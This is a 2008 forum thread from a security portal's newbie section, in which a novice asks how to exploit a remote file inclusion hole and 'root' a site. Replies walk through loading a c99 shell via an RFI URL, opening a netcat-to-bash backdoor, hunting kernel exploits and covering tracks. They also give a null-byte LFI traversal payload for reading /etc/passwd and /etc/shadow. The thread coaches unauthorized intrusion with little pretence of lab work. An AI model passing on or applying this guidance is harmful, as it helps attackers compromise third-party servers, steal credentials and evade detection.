Waraxe IT Security Portal
Login or Register
November 24, 2024
Menu
Home
Logout
Discussions
Forums
Members List
IRC chat
Tools
Base64 coder
MD5 hash
CRC32 checksum
ROT13 coder
SHA-1 hash
URL-decoder
Sql Char Encoder
Affiliates
y3dips ITsec
Md5 Cracker
User Manuals
AlbumNow
Content
Content
Sections
FAQ
Top
Info
Feedback
Recommend Us
Search
Journal
Your Account
User Info
Welcome, Anonymous
Nickname
Password
(Register)

Membership:
Latest: MichaelSnaRe
New Today: 0
New Yesterday: 0
Overall: 9144

People Online:
Visitors: 41
Members: 0
Total: 41
Full disclosure
APPLE-SA-11-19-2024-5 macOS Sequoia 15.1.1
Local Privilege Escalations in needrestart
APPLE-SA-11-19-2024-4 iOS 17.7.2 and iPadOS 17.7.2
APPLE-SA-11-19-2024-3 iOS 18.1.1 and iPadOS 18.1.1
APPLE-SA-11-19-2024-2 visionOS 2.1.1
APPLE-SA-11-19-2024-1 Safari 18.1.1
Reflected XSS - fronsetiav1.1
XXE OOB - fronsetiav1.1
St. Poelten UAS | Path Traversal in Korenix JetPort 5601
St. Poelten UAS | Multiple Stored Cross-Site Scripting in SEH utnserver Pro
Apple web content filter bypass allows unrestricted access to blocked content (macOS/iOS/iPadOS/visionO S/watchOS)
SEC Consult SA-20241112-0 :: Multiple vulnerabilities in Siemens Energy Omnivise T3000 (CVE-2024-38876, CVE-2024-38877, CVE-2024-38878, CVE-2024-38879)
Security issue in the TX Text Control .NET Server for ASP.NET.
SEC Consult SA-20241107-0 :: Multiple Vulnerabilities in HASOMED Elefant and Elefant Software Updater
Unsafe eval() in TestRail CLI
Log in Register Forum FAQ Memberlist Search
IT Security and Insecurity Portal

www.waraxe.us Forum Index -> Newbies corner -> noobish post. :D
Post new topicReply to topic View previous topic :: View next topic
noobish post. :D
PostPosted: Tue Aug 05, 2008 10:40 am Reply with quote
sol1dzer0
Regular user
Regular user
Joined: Jan 21, 2008
Posts: 24




so i have some questions..

1. first one is about Rfi if i have found Rfi vuln site [atleast i tihnk so] what should i dot next ?!

i have made host and uploaded c99 in it.. and did something like this..

www.vulnsyte.com/index.php?page=http://www.myhost.com/c99.php

but seems nothing happens.. -.-' ! for Rfi there is not many tuts what i have found -.- so im total newB to this.. !

* what is moust common errors which lead to Rfi ?! it would be nice if u could show me exmples like in sql inj. ''You have error in your sql syntax''

* what is ussual next step on Rfi ?! always upload some shell / script or something ?! i dont kinda get it.. ;/

*what should i know to undertstand better Rfi ? 0_o mby someone got some good tutoirals about this ?! [what i know i need to know all about victim ex. what OS is running is there php html. or fp running ect.]


2. Rooting.. hmm yea.. totla 0 for me.. would be nice if i get redir. on some good tutorial.. something like Rooting for n00bs Very Happy !! what it is what can i do with it.. ex.


so i hope i get some help with this.. !

thankyou.
Embarassed
View user's profile Send private message Visit poster's website
PostPosted: Tue Aug 05, 2008 11:09 am Reply with quote
lenny
Valuable expert
Valuable expert
Joined: May 15, 2008
Posts: 275




Well are you sure the page is vulnerable to RFI? index.php may have a set of filters to strip out the ":" of "http://", or in fact any URL altogether. Their host may also be set up to disable URL based includes (which is quite common). I believe that URL based includes are OFF in php.ini by default. Those could be your two main problems with your attack currently!

If you do manage to get an include, be sure to upload a shell - just keep it simple. Don't leave files on their server that are unnecessary, or you will arouse their suspicions. My usual approach (strictly lab based attacks, and for pen testing) is to start a netcat instance on their server forwarding to bash - essentially it allows me shell access in a more convinent environment than through a php script! From your makeshift ssh server, you can get to work looking at other expoits, for example in the kernel. Be sure to cover your tracks!

I suppose all that is pretty confusing, so ask away your questions - im here all week Razz
View user's profile Send private message
PostPosted: Tue Aug 05, 2008 11:58 am Reply with quote
oniric
Advanced user
Advanced user
Joined: Jul 24, 2008
Posts: 65




A rooting paper would be usefull for me too ^_^

Probably PHP is configured to not allow remote file inclusion through HTTP or other net protocols. It's very very common nowadays like lenny said. Such vulns come from code like this:

include "../my/path/.".$_GET['page'].".php";

In such situations you could exploit this to load files that are out of the htdocs folder of the webserver. And you can load file with other extensions beside .php that is automatically added by the code adding a NULL byte to you request like so

http://vulnsite.com/index.php?page=../../etc/passwd%00

That's only an example, also probably you need to urlencode slashes. Please note the use of ../ to traverse file system backward.

Yes, better if you know the victim OS so you can easily locate files on the file system. Just play with paths and directory traversal looking for known file locations like /etc/passwd on linux systems. When you have such information you can start harvesting other usefull information from other files and maybe if the server is running as root opening /etc/shadow file Smile
View user's profile Send private message
PostPosted: Tue Aug 05, 2008 12:43 pm Reply with quote
sol1dzer0
Regular user
Regular user
Joined: Jan 21, 2008
Posts: 24




Thank u guys Smile hmm bit hard to understand this but i will try to learn ;] this is not so easy as SQL injection lol Very Happy but i thought the same about sql inject. when i didnt know anythin.. ;] ! tnx in advice.. if u two or anybody got something more to say plzz reply ;]

more info = better succes Smile
View user's profile Send private message Visit poster's website
PostPosted: Tue Aug 05, 2008 1:06 pm Reply with quote
oniric
Advanced user
Advanced user
Joined: Jul 24, 2008
Posts: 65




Mmm, I think sqli is far more difficult ^_^ You need to know SQL, not always but in many cases.

One thing more: NULL Byte, %00, works because it's the urlencoded version of \0, the C,C++ NULL Byte also known as the string terminator. So if the string sequence is


mystring%00isasd

php would "see" only mystring.
View user's profile Send private message
PostPosted: Tue Aug 05, 2008 1:13 pm Reply with quote
sol1dzer0
Regular user
Regular user
Joined: Jan 21, 2008
Posts: 24




oniric wrote:
Mmm, I think sqli is far more difficult ^_^ You need to know SQL, not always but in many cases.

One thing more: NULL Byte, %00, works because it's the urlencoded version of \0, the C,C++ NULL Byte also known as the string terminator. So if the string sequence is


mystring%00isasd

php would "see" only mystring.


noot sql inj is much more easy than this ;] ! i can pm good tuts on it if u need them xDD !! ;] %00 k will keep that in mind Smile
View user's profile Send private message Visit poster's website
PostPosted: Tue Aug 05, 2008 1:18 pm Reply with quote
oniric
Advanced user
Advanced user
Joined: Jul 24, 2008
Posts: 65




Ah no, thx, SQLi it's my field ^_^ I really like it, and exploiting it it's such fun Smile
View user's profile Send private message
PostPosted: Tue Aug 05, 2008 1:23 pm Reply with quote
lenny
Valuable expert
Valuable expert
Joined: May 15, 2008
Posts: 275




I try and stay away form SQL injection Smile I really dislike it! I prefer somthing more solid, and that includes social engineering! It is a valid form of hacking, and it has served me well (and solidly) on many occasions!

Anyway, do you need any more information? or should that suffice for now? Keep us informed, we can always help out if you need further assistance! Wink
View user's profile Send private message
PostPosted: Tue Aug 05, 2008 2:02 pm Reply with quote
sol1dzer0
Regular user
Regular user
Joined: Jan 21, 2008
Posts: 24




yea somebody likes sql and somebody dislikes it ! ;]

and about Rfi right now it's ok will try to read some more stuff and learn more ;] ! mby someone in IRC will help me ;D
btw i cannot connect to this site irc channel.. plugin missing and i cannot download it.. -.-' damn.. wantedt to talk with you guys !!



anyway thankyou u all !! you are kind ppl Wink !
View user's profile Send private message Visit poster's website
PostPosted: Tue Aug 05, 2008 2:15 pm Reply with quote
oniric
Advanced user
Advanced user
Joined: Jul 24, 2008
Posts: 65




Or LFI, more common Wink Probably your best bet, as I and lenny said RFI in PHP is no longer so common. There's a setting in php.ini, called allow_url_fopen, that's commonly set to Off. And also if the code it's like


include "somethinghere".$_GET['page'];

you can't overwrite the somethinghere part so you can't call external http files in such a case ( very common ).
View user's profile Send private message
noobish post. :D
www.waraxe.us Forum Index -> Newbies corner
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
All times are GMT
Page 1 of 1

Post new topicReply to topic


Powered by phpBB © 2001-2008 phpBB Group



Space Raider game for Android, free download - Space Raider gameplay video - Zone Raider mobile games
All logos and trademarks in this site are property of their respective owner. The comments and posts are property of their posters, all the rest (c) 2004-2024 Janek Vind "waraxe"
Page Generation: 0.036 Seconds